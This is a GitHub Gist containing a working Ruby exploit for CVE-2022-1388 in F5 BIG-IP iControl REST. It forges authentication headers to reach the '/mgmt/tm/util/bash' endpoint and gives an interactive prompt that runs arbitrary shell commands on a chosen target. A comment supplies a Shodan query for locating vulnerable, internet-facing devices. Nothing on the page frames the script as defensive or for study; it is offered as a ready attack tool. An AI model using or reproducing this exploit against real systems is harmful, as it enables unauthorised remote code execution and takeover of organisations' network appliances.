Created
September 20, 2022 18:34
-
-
Save komodoooo/77aca9410767e6d0063191c0bc7b27e9 to your computer and use it in GitHub Desktop.
CVE-2022-1388 exploit via the "/mgmt/tm/util/bash" endpoint.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'http' | |
| require 'openssl' | |
| puts """ | |
| CVE-2022-1388 | |
| F5 BIG-IP iControl REST RCE exploit | |
| By komodo\n | |
| """ | |
| =begin | |
| Shodan query to search vulnerable targets: | |
| "BIG-IP®-+Redirect"+"Server" | |
| https://www.shodan.io/search?query=%22BIG-IP%26reg%3B-%2BRedirect%22%2B%22Server%22 | |
| (sometimes they're flagged as honeypot) | |
| =end | |
| def main(target, command) | |
| headerz = { | |
| "Content-Type" => "application/json", | |
| "Connection"=> "keep-alive, x-F5-Auth-Token", | |
| "X-F5-Auth-Token"=> "a", | |
| "Authorization" => "Basic YWRtaW46" | |
| } | |
| payload = { | |
| "command" => "run", | |
| "utilCmdArgs" => "-c #{command}" | |
| } | |
| target.delete_suffix!("/") unless target[-1..-1] != "/" | |
| url = target += "/mgmt/tm/util/bash" | |
| begin | |
| ctx = OpenSSL::SSL::SSLContext.new() | |
| ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE | |
| sus = HTTP.post(url, :headers=>headerz, :json=>payload, :ssl_context => ctx) | |
| if sus.to_s.include?("commandResult") | |
| puts sus.to_s.gsub(",", ",\n") | |
| else | |
| puts "Bro this is not vulnerable lol" | |
| exit() | |
| end | |
| rescue => e | |
| puts e | |
| end | |
| end | |
| print "Target url: " | |
| target_url = gets.chomp | |
| while true | |
| print "\r> " | |
| main(target_url, gets.chomp) | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Unfortunately, the results indexed by shodan are far fewer due to the patches adopted by companies.